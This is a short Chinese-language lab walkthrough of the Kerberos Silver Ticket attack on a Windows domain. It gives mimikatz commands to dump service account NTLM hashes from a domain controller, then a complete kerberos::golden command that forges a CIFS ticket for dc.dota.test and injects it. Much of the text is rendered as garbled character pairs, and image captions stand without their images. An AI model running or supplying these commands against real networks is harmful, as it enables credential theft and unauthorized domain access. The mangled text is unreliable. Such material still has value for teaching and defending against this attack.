? 白銀票據(jù)(Silver Ticket),利用過程是偽造TGS
? 通過已知的授權(quán)服務(wù)密碼生成一張可以訪問該服務(wù)的票據(jù)
? 白銀票據(jù)生成過程中,不需要經(jīng)過KDC,不需要域域控交互
? 白銀票據(jù)依賴服務(wù)賬戶的密碼散列值
? 常見服務(wù):LDAP、MSSQL、DNS、CIFS等
實(shí)驗(yàn)——使用白銀票據(jù)偽造CIFS服務(wù)權(quán)限
準(zhǔn)備:
? 域名:dota.test
? 域SID::S-1-5-21-148781454-1908209042-142103015
? 目標(biāo)服務(wù)器的FQDN:dc.dota.test
? 可利用的服務(wù):cifs
? 服務(wù)賬號(hào)的 NTLM Hash:2d9349a3f260cd283a6c030c01503420
? 需要偽造的用戶名:win7
1、在域控制器中,使用mimikatz獲取服務(wù)賬號(hào)的NTLM Hash
privilege::debug
log
sekurlsa::logonpasswords


2、偽造白銀票據(jù)(在域成員機(jī)中 win7)
kerberos::golden /domain:dota.test /sid:S-1-5-21-148781454-1908209042-142103015 /target:dc.dota.test /service:cifs /rc4:2d9349a3f260cd283a6c030c01503420 /user:win7 /ptt

偽造白銀票據(jù)
3、驗(yàn)證權(quán)限

驗(yàn)證權(quán)限

查看票據(jù)